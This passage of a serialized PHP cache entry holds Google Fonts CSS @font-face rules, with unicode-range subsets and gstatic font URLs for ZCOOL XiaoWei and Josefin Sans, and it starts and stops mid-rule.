U+5448, U+5496, U+54ed, U+5565, U+5761, U+5766, U+58ee, U+593a, U+594b, U+594f, U+5954, U+5996, U+59c6, U+59ff, U+5b64, U+5bff, U+5c18, U+5c1d, U+5c97, U+5ca9, U+5cb8, U+5e9f, U+5ec9, U+5f04, U+5f7b, U+5fa1, U+5fcd, U+6012, U+60a6, U+60ac, U+60b2, U+60ef, U+626e, U+6270, U+6276, U+62d6, U+62dc, U+6316, U+632f, U+633a, U+6355, U+63aa, U+6447, U+649e, U+64c5, U+654c, U+65c1, U+65cb, U+65e6, U+6606, U+6731, U+675c, U+67cf, U+67dc, U+6846, U+6b8b, U+6beb, U+6c61, U+6c88, U+6cbf, U+6cdb, U+6cea, U+6d45, U+6d53, U+6d74, U+6d82, U+6da8, U+6db5, U+6deb, U+6eda, U+6ee8, U+6f0f, U+706d, U+708e, U+70ae, U+70bc, U+70c2, U+70e6, U+7237-7238, U+72fc, U+730e, U+731b, U+739b, U+73bb, U+7483, U+74dc, U+74f6, U+7586, U+7626, U+775b, U+77ff, U+788e, U+78b0, U+7956, U+7965, U+79e6, U+7af9, U+7bee, U+7c97, U+7eb1, U+7eb7, U+7ed1, U+7ed5, U+7f6a, U+7f72, U+7fbd, U+8017, U+808c, U+80a9, U+80c6, U+80ce, U+8150, U+8170, U+819c, U+820d, U+8230, U+8239, U+827e, U+8377, U+8389, U+83b2, U+8428, U+8463, U+867e, U+88c2, U+88d9, U+8986, U+8bca, U+8bde, U+8c13, U+8c8c, U+8d21, U+8d24, U+8d56, U+8d60, U+8d8b, U+8db4, U+8e2a, U+8f68, U+8f89, U+8f9b, U+8fa8, U+8fbd, U+9003, U+90ce, U+90ed, U+9189, U+94bb, U+9505, U+95f9, U+963b, U+9655, U+966a, U+9677, U+96fe, U+9896, U+99a8, U+9a71, U+9a82, U+9a91, U+9b45, U+9ece, U+9f20, U+feff, U+ff0d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.111.woff2) format(\'woff2\');unicode-range: U+4e4c, U+4e88, U+4ea1, U+4ea6, U+4ed3-4ed4, U+4eff, U+4f30, U+4fa7, U+4fc4, U+4fd7, U+500d, U+504f, U+5076-5077, U+517d, U+5192, U+51c9, U+51ef, U+5238, U+5251, U+526a, U+52c7, U+52df, U+52ff, U+53a6, U+53a8, U+53ec, U+5410, U+559d, U+55b7, U+5634, U+573e, U+5783, U+585e, U+586b, U+58a8, U+5999, U+59d3, U+5a1c, U+5a46, U+5b54-5b55, U+5b85, U+5b8b, U+5b8f, U+5bbf, U+5bd2, U+5c16, U+5c24, U+5e05, U+5e45, U+5e7c, U+5e84, U+5f03, U+5f1f, U+5f31, U+5f84, U+5f90, U+5fbd, U+5fc6, U+5fd9, U+5fe7, U+6052, U+6062, U+6089, U+60a3, U+60d1, U+6167, U+622a, U+6234, U+624e, U+6269, U+626c, U+62b5, U+62d2, U+6325, U+63e1, U+643a, U+6446, U+6562, U+656c, U+65e2, U+65fa, U+660c, U+6628, U+6652, U+6668, U+6676, U+66fc, U+66ff, U+6717, U+676d, U+67aa, U+67d4, U+6843, U+6881, U+68d2, U+695a, U+69fd, U+6a2a, U+6b8a, U+6c60, U+6c64, U+6c9f, U+6caa, U+6cc9, U+6ce1, U+6cfd, U+6d1b, U+6d1e, U+6d6e, U+6de1, U+6e10, U+6e7f, U+6f5c, U+704c, U+7070, U+7089, U+70b8, U+718a, U+71c3, U+723d, U+732a, U+73cd, U+7518, U+756a, U+75af, U+75be, U+75c7, U+76d2, U+76d7, U+7763, U+78e8, U+795d, U+79df, U+7c4d, U+7d2f, U+7ee9, U+7f13, U+7f8a, U+8000, U+8010, U+80af, U+80f6, U+80f8, U+8212, U+8273, U+82f9, U+83ab, U+83b1, U+83f2, U+8584, U+871c, U+8861, U+888b, U+88c1, U+88e4, U+8bd1, U+8bf1, U+8c31, U+8d5a, U+8d75-8d76, U+8de8, U+8f85, U+8fa3, U+8fc5, U+9006, U+903c, U+904d, U+9075, U+9178, U+9274, U+950b, U+9526, U+95ea, U+9636, U+9686, U+978b, U+987f, U+9a7e, U+9b42, U+9e1f, U+9ea6, U+9f13, U+9f84, U+ff5e;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.112.woff2) format(\'woff2\');unicode-range: U+23, U+3d, U+4e01, U+4e39, U+4e73, U+4ecd, U+4ed9, U+4eea, U+4f0a, U+4f1f, U+4f5b, U+4fa0, U+4fc3, U+501f, U+50a8, U+515a, U+5175, U+51a0, U+51c0, U+51e1, U+51e4, U+5200, U+520a, U+5224, U+523a, U+52aa, U+52b1, U+52b3, U+5348, U+5353, U+5360, U+5371, U+5377, U+539a, U+541b, U+5434, U+547c, U+54e6, U+5510, U+5531, U+5609, U+56f0, U+56fa, U+5733, U+574f, U+5851, U+5854, U+5899, U+58c1, U+592e, U+5939, U+5976, U+5986, U+59bb, U+5a18, U+5a74, U+5b59, U+5b87, U+5b97, U+5ba0, U+5bab, U+5bbd-5bbe, U+5bf8, U+5c0a, U+5c3a, U+5c4a, U+5e16, U+5e1d, U+5e2d, U+5e8a, U+6015, U+602a, U+6050, U+6069, U+6162, U+61c2, U+6293, U+6297, U+62b1, U+62bd, U+62df, U+62fc, U+6302, U+635f, U+638c, U+63ed, U+6458, U+6469, U+6563, U+6620, U+6653, U+6696-6697, U+66dd, U+675f, U+676f-6770, U+67d0, U+67d3, U+684c, U+6865, U+6885, U+68b0, U+68ee, U+690d, U+6b23, U+6b32, U+6bd5, U+6c89, U+6d01, U+6d25, U+6d89, U+6da6, U+6db2, U+6df7, U+6ed1, U+6f02, U+70c8, U+70df, U+70e7, U+7126, U+7236, U+7259, U+731c, U+745e, U+74e3, U+751a, U+751c, U+7532, U+7545, U+75db, U+7761, U+7a0d, U+7b51, U+7ca4, U+7cd6, U+7d2b, U+7ea0, U+7eb9, U+7ed8, U+7f18, U+7f29, U+8033, U+804a, U+80a4-80a5, U+80e1, U+817f, U+829d, U+82e6, U+8336, U+840c, U+8499, U+864e, U+8651, U+865a, U+88ad, U+89e6, U+8bd7, U+8bfa, U+8c37, U+8d25, U+8d38, U+8ddd, U+8fea, U+9010, U+9012, U+906d, U+907f-9080, U+90d1, U+9177, U+91ca, U+94fa, U+9501, U+9634-9635, U+9694, U+9707, U+9738, U+9769, U+9a7b, U+9a97, U+9aa8, U+9b3c, U+9c81, U+9ed8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.113.woff2) format(\'woff2\');unicode-range: U+26, U+3c, U+d7, U+4e4e, U+4e61, U+4e71, U+4ebf, U+4f26, U+5012, U+51ac, U+51b0, U+51b2, U+51b7, U+5218, U+521a, U+5220, U+5237, U+523b, U+526f, U+5385, U+53bf, U+53e5, U+53eb, U+53f3, U+53f6, U+5409, U+5438, U+54c8, U+54e5, U+552f, U+5584, U+5706, U+5723, U+5750, U+575a, U+5987-5988, U+59b9, U+59d0, U+59d4, U+5b88, U+5b9c, U+5bdf, U+5bfb, U+5c01, U+5c04, U+5c3e, U+5c4b, U+5c4f, U+5c9b, U+5cf0, U+5ddd, U+5de6, U+5de8, U+5e01, U+5e78, U+5e7b, U+5e9c, U+5ead, U+5ef6, U+5f39, U+5fd8, U+6000, U+6025, U+604b, U+6076, U+613f, U+6258, U+6263, U+6267, U+6298, U+62a2, U+62e5, U+62ec, U+6311, U+6377, U+6388-6389, U+63a2, U+63d2, U+641e, U+642d, U+654f, U+6551, U+6597, U+65cf, U+65d7, U+65e7, U+6682, U+66f2, U+671d, U+672b, U+6740, U+6751, U+6768, U+6811, U+6863, U+6982, U+6bd2, U+6cf0, U+6d0b, U+6d17, U+6d59, U+6dd8, U+6dfb, U+6e7e, U+6f6e, U+6fb3, U+706f, U+719f, U+72af, U+72d0, U+72d7, U+732b, U+732e, U+7389, U+73e0, U+7530, U+7687, U+76d6, U+76db, U+7840, U+786c, U+79cb, U+79d2, U+7a0e, U+7a33, U+7a3f, U+7a97, U+7ade-7adf, U+7b26, U+7e41, U+7ec3, U+7f3a, U+8089, U+80dc, U+811a, U+8131, U+8138, U+821e, U+8349, U+83dc, U+8457, U+867d, U+86cb, U+8a89, U+8ba8, U+8bad, U+8bef, U+8bfe, U+8c6a, U+8d1d, U+8d4f, U+8d62, U+8dd1, U+8df3, U+8f6e, U+8ff9, U+900f, U+9014, U+9057, U+9192, U+91ce, U+9488, U+94a2, U+9547, U+955c, U+95f2, U+9644, U+964d, U+96c4-96c5, U+96e8, U+96f6-96f7, U+9732, U+9759, U+9760, U+987a, U+989c, U+9910, U+996d-996e, U+9b54, U+9e21, U+9ebb, U+9f50;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.114.woff2) format(\'woff2\');unicode-range: U+7e, U+2026, U+4e03, U+4e25, U+4e30, U+4e34, U+4e45, U+4e5d, U+4e89, U+4eae, U+4ed8, U+4f11, U+4f19, U+4f24, U+4f34, U+4f59, U+4f73, U+4f9d, U+4fb5, U+5047, U+505c, U+5170, U+519c, U+51cf, U+5267, U+5356, U+5374, U+5382, U+538b, U+53e6, U+5426, U+542b, U+542f, U+5462, U+5473, U+554a, U+5566, U+5708, U+571f, U+5757, U+57df, U+57f9, U+5802, U+590f, U+591c, U+591f, U+592b, U+5965, U+5979, U+5a01, U+5a5a, U+5b63, U+5b69, U+5b81, U+5ba1, U+5ba3, U+5c3c, U+5c42, U+5c81, U+5de7, U+5dee, U+5e0c, U+5e10, U+5e55, U+5e86, U+5e8f, U+5ea7, U+5f02, U+5f52, U+5f81, U+5ff5, U+60ca, U+60e0, U+6279, U+62c5, U+62ff, U+63cf, U+6444, U+64cd, U+653b, U+65bd, U+65e9, U+665a, U+66b4, U+66fe, U+6728, U+6742, U+677e, U+67b6, U+680f, U+68a6, U+68c0, U+699c, U+6b4c, U+6b66, U+6b7b, U+6bcd, U+6bdb, U+6c38, U+6c47, U+6c49, U+6cb3, U+6cb9, U+6ce2, U+6d32, U+6d3e, U+6d4f, U+6e56, U+6fc0, U+7075, U+7206, U+725b, U+72c2, U+73ed, U+7565, U+7591, U+7597, U+75c5, U+76ae, U+76d1, U+76df, U+7834, U+7968, U+7981, U+79c0, U+7a7f, U+7a81, U+7ae5, U+7b14, U+7c89, U+7d27, U+7eaf, U+7eb3, U+7eb8, U+7ec7, U+7ee7, U+7eff, U+7f57, U+7ffb, U+805a, U+80a1, U+822c, U+82cf, U+82e5, U+8363, U+836f, U+84dd, U+878d, U+8840, U+8857, U+8863, U+8865, U+8b66, U+8bb2, U+8bda, U+8c01, U+8c08, U+8c46, U+8d1f, U+8d35, U+8d5b, U+8d5e, U+8da3, U+8ddf, U+8f93, U+8fdd, U+8ff0, U+8ff7, U+8ffd, U+9000, U+9047, U+9152, U+949f, U+94c1, U+94f6, U+9646, U+9648, U+9669, U+969c, U+96ea, U+97e9, U+987b, U+987e, U+989d, U+9970, U+9986, U+9c7c, U+9c9c;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.115.woff2) format(\'woff2\');unicode-range: U+25, U+4e14, U+4e1d, U+4e3d, U+4e49, U+4e60, U+4e9a, U+4eb2, U+4ec5, U+4efd, U+4f3c, U+4f4f, U+4f8b, U+4fbf, U+5019, U+5145, U+514b, U+516b, U+516d, U+5174, U+5178, U+517b, U+5199, U+519b, U+51b3, U+51b5, U+5207, U+5212, U+5219, U+521d, U+52bf, U+533b, U+5343, U+5347, U+534a, U+536b, U+5370, U+53e4, U+53f2, U+5403, U+542c, U+547d, U+54a8, U+54cd, U+54ea, U+552e, U+56f4, U+5747, U+575b, U+5883, U+589e, U+5931, U+5947, U+5956-5957, U+5a92, U+5b83, U+5ba4, U+5bb3, U+5bcc, U+5c14, U+5c1a, U+5c3d, U+5c40, U+5c45, U+5c5e, U+5df4, U+5e72, U+5e95, U+5f80, U+5f85, U+5fb7, U+5fd7, U+601d, U+626b, U+627f, U+62c9, U+62cd, U+6309, U+63a7, U+6545, U+65ad, U+65af, U+65c5, U+666e, U+667a, U+670b, U+671b, U+674e, U+677f, U+6781, U+6790, U+6797, U+6821, U+6838-6839, U+697c, U+6b27, U+6b62, U+6bb5, U+6c7d, U+6c99, U+6d4b, U+6d4e, U+6d6a, U+6e29, U+6e2f, U+6ee1, U+6f14, U+6f2b, U+72b6, U+72ec, U+7387, U+7533, U+753b, U+76ca, U+76d8, U+7701, U+773c, U+77ed, U+77f3, U+7814, U+793c, U+79bb, U+79c1, U+79d8, U+79ef, U+79fb, U+7a76, U+7b11, U+7b54, U+7b56, U+7b97, U+7bc7, U+7c73, U+7d20, U+7eaa, U+7ec8, U+7edd, U+7eed, U+7efc, U+7fa4, U+804c, U+8058, U+80cc, U+8111, U+817e, U+826f, U+8303, U+843d, U+89c9, U+89d2, U+8ba2, U+8bbf, U+8bc9, U+8bcd, U+8be6, U+8c22, U+8c61, U+8d22, U+8d26-8d27, U+8d8a, U+8f6f, U+8f7b, U+8f83, U+8f91, U+8fb9, U+8fd4, U+8fdc, U+9002, U+94b1, U+9519, U+95ed, U+961f, U+9632-9633, U+963f, U+968f-9690, U+96be, U+9876, U+9884, U+98de, U+9988, U+9999, U+9ec4, U+ff1b;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.116.woff2) format(\'woff2\');unicode-range: U+2b, U+40, U+3000, U+300a-300b, U+4e16, U+4e66, U+4e70, U+4e91-4e92, U+4e94, U+4e9b, U+4ec0, U+4eca, U+4f01, U+4f17-4f18, U+4f46, U+4f4e, U+4f9b, U+4fee, U+503c, U+5065, U+50cf, U+513f, U+5148, U+518d, U+51c6, U+51e0, U+5217, U+529e-529f, U+5341, U+534f, U+5361, U+5386, U+53c2, U+53c8, U+53cc, U+53d7-53d8, U+53ea, U+5404, U+5411, U+5417, U+5427, U+5468, U+559c, U+5668, U+56e0, U+56e2, U+56ed, U+5740, U+57fa, U+58eb, U+5904, U+592a, U+59cb, U+5a31, U+5b58, U+5b9d, U+5bc6, U+5c71, U+5dde, U+5df1, U+5e08, U+5e26, U+5e2e, U+5e93, U+5e97, U+5eb7, U+5f15, U+5f20, U+5f3a, U+5f62, U+5f69, U+5f88, U+5f8b, U+5fc5, U+600e, U+620f, U+6218, U+623f, U+627e, U+628a, U+62a4, U+62db, U+62e9, U+6307, U+6362, U+636e, U+64ad, U+6539, U+653f, U+6548, U+6574, U+6613, U+6625, U+663e, U+666f, U+672a, U+6750, U+6784, U+6a21, U+6b3e, U+6b65, U+6bcf, U+6c11, U+6c5f, U+6df1, U+706b, U+7167, U+724c, U+738b, U+73a9, U+73af, U+7403, U+7537, U+754c, U+7559, U+767d, U+7740, U+786e, U+795e, U+798f, U+79f0, U+7aef, U+7b7e, U+7bb1, U+7ea2, U+7ea6, U+7ec4, U+7ec6, U+7ecd, U+7edc, U+7ef4, U+8003, U+80b2, U+81f3-81f4, U+822a, U+827a, U+82f1, U+83b7, U+8425, U+89c2, U+89c8, U+8ba9, U+8bb8, U+8bc6, U+8bd5, U+8be2, U+8be5, U+8bed, U+8c03, U+8d23, U+8d2d, U+8d34, U+8d70, U+8db3, U+8fbe, U+8fce, U+8fd1, U+8fde, U+9001, U+901f-9020, U+90a3, U+914d, U+91c7, U+94fe, U+9500, U+952e, U+9605, U+9645, U+9662, U+9664, U+9700, U+9752, U+975e, U+97f3, U+9879, U+9886, U+98df, U+9a6c, U+9a8c, U+9ed1, U+9f99;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.117.woff2) format(\'woff2\');unicode-range: U+4e, U+201c-201d, U+3010-3011, U+4e07, U+4e1c, U+4e24, U+4e3e, U+4e48, U+4e50, U+4e5f, U+4e8b-4e8c, U+4ea4, U+4eab-4eac, U+4ecb, U+4ece, U+4ed6, U+4ee3, U+4ef6-4ef7, U+4efb, U+4f20, U+4f55, U+4f7f, U+4fdd, U+505a, U+5143, U+5149, U+514d, U+5171, U+5177, U+518c, U+51fb, U+521b, U+5229, U+522b, U+52a9, U+5305, U+5317, U+534e, U+5355, U+5357, U+535a, U+5373, U+539f, U+53bb, U+53ca, U+53cd, U+53d6, U+53e3, U+53f0, U+5458, U+5546, U+56db, U+573a, U+578b, U+57ce, U+58f0, U+590d, U+5934, U+5973, U+5b57, U+5b8c, U+5b98, U+5bb9, U+5bfc, U+5c06, U+5c11, U+5c31, U+5c55, U+5df2, U+5e03, U+5e38, U+5e76, U+5e94, U+5efa, U+5f71, U+5f97, U+5feb, U+6001, U+603b, U+60f3, U+611f, U+6216, U+624d, U+6253, U+6295, U+6301, U+6392, U+641c, U+652f, U+653e, U+6559, U+6599, U+661f, U+671f, U+672f, U+6761, U+67e5, U+6807, U+6837, U+683c, U+6848, U+6b22, U+6b64, U+6bd4, U+6c14, U+6c34, U+6c42, U+6ca1, U+6d41, U+6d77, U+6d88, U+6e05, U+6e38, U+6e90, U+7136, U+7231, U+7531, U+767e, U+76ee, U+76f4, U+771f, U+7801, U+793a, U+79cd, U+7a0b, U+7a7a, U+7acb, U+7ae0, U+7b2c, U+7b80, U+7ba1, U+7cbe, U+7d22, U+7ea7, U+7ed3, U+7ed9, U+7edf, U+7f16, U+7f6e, U+8001, U+800c, U+8272, U+8282, U+82b1, U+8350, U+88ab, U+88c5, U+897f, U+89c1, U+89c4, U+89e3, U+8a00, U+8ba1, U+8ba4, U+8bae-8bb0, U+8bbe, U+8bc1, U+8bc4, U+8bfb, U+8d28, U+8d39, U+8d77, U+8d85, U+8def, U+8eab, U+8f66, U+8f6c, U+8f7d, U+8fd0, U+9009, U+90ae, U+90fd, U+91cc-91cd, U+91cf, U+95fb, U+9650, U+96c6, U+9891, U+98ce, U+ff1f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.118.woff2) format(\'woff2\');unicode-range: U+d, U+3e, U+5f, U+7c, U+a0, U+a9, U+4e09-4e0b, U+4e0d-4e0e, U+4e13, U+4e1a, U+4e2a, U+4e3a-4e3b, U+4e4b, U+4e86, U+4e8e, U+4ea7, U+4eba, U+4ee4-4ee5, U+4eec, U+4f1a, U+4f4d, U+4f53, U+4f5c, U+4f60, U+4fe1, U+5165, U+5168, U+516c, U+5173, U+5176, U+5185, U+51fa, U+5206, U+5230, U+5236, U+524d, U+529b, U+52a0-52a1, U+52a8, U+5316, U+533a, U+53cb, U+53d1, U+53ef, U+53f7-53f8, U+5408, U+540c-540e, U+544a, U+548c, U+54c1, U+56de, U+56fd-56fe, U+5728, U+5730, U+5907, U+5916, U+591a, U+5927, U+5929, U+597d, U+5982, U+5b50, U+5b66, U+5b89, U+5b9a, U+5b9e, U+5ba2, U+5bb6, U+5bf9, U+5c0f, U+5de5, U+5e02, U+5e73-5e74, U+5e7f, U+5ea6, U+5f00, U+5f0f, U+5f53, U+5f55, U+5fae, U+5fc3, U+6027, U+606f, U+60a8, U+60c5, U+610f, U+6210-6211, U+6237, U+6240, U+624b, U+6280, U+62a5, U+63a5, U+63a8, U+63d0, U+6536, U+6570, U+6587, U+65b9, U+65e0, U+65f6, U+660e, U+662d, U+662f, U+66f4, U+6700, U+670d, U+672c, U+673a, U+6743, U+6765, U+679c, U+682a, U+6b21, U+6b63, U+6cbb, U+6cd5, U+6ce8, U+6d3b, U+70ed, U+7247-7248, U+7269, U+7279, U+73b0, U+7406, U+751f, U+7528, U+7535, U+767b, U+76f8, U+770b, U+77e5, U+793e, U+79d1, U+7ad9, U+7b49, U+7c7b, U+7cfb, U+7ebf, U+7ecf, U+7f8e, U+8005, U+8054, U+80fd, U+81ea, U+85cf, U+884c, U+8868, U+8981, U+89c6, U+8bba, U+8bdd, U+8bf4, U+8bf7, U+8d44, U+8fc7, U+8fd8-8fd9, U+8fdb, U+901a, U+9053, U+90e8, U+91d1, U+957f, U+95e8, U+95ee, U+95f4, U+9762, U+9875, U+9898, U+9996, U+9ad8, U+ff01, U+ff08-ff09;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.119.woff2) format(\'woff2\');unicode-range: U+20-22, U+27-2a, U+2c-3b, U+3f, U+41-4d, U+4f-5d, U+61-7b, U+7d, U+ab, U+ae, U+b2, U+b7, U+bb, U+df-e5, U+e7-ea, U+ec-ed, U+f1-f4, U+f6, U+f9-fa, U+fc, U+101, U+103, U+113, U+12b, U+148, U+14d, U+16b, U+1ce, U+1d0, U+300-301, U+1ebf, U+1ec7, U+2013-2014, U+2022, U+2027, U+2039-203a, U+2122, U+3001-3002, U+3042, U+3044, U+3046, U+3048, U+304a-3055, U+3057, U+3059-305b, U+305d, U+305f-3061, U+3063-306b, U+306d-3073, U+3075-3076, U+3078-3079, U+307b, U+307e-307f, U+3081-308d, U+308f, U+3092-3093, U+30a1-30a4, U+30a6-30bb, U+30bd, U+30bf-30c1, U+30c3-30c4, U+30c6-30cb, U+30cd-30d7, U+30d9-30e1, U+30e3-30e7, U+30e9-30ed, U+30ef, U+30f3, U+30fb-30fc, U+3127, U+4e00, U+4e2d, U+65b0, U+65e5, U+6708-6709, U+70b9, U+7684, U+7f51, U+ff0c, U+ff0e, U+ff1a;}/* latin */@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1UFWaHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}\";}s:459:\"https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic|ZCOOL+XiaoWei:regular&subset=latin,latin-ext&display=swap_modern_ua\";a:1:{s:12:\"google-fonts\";s:523436:\"/* Original: https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic|ZCOOL+XiaoWei:regular&subset=latin,latin-ext&display=swap *//* User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, 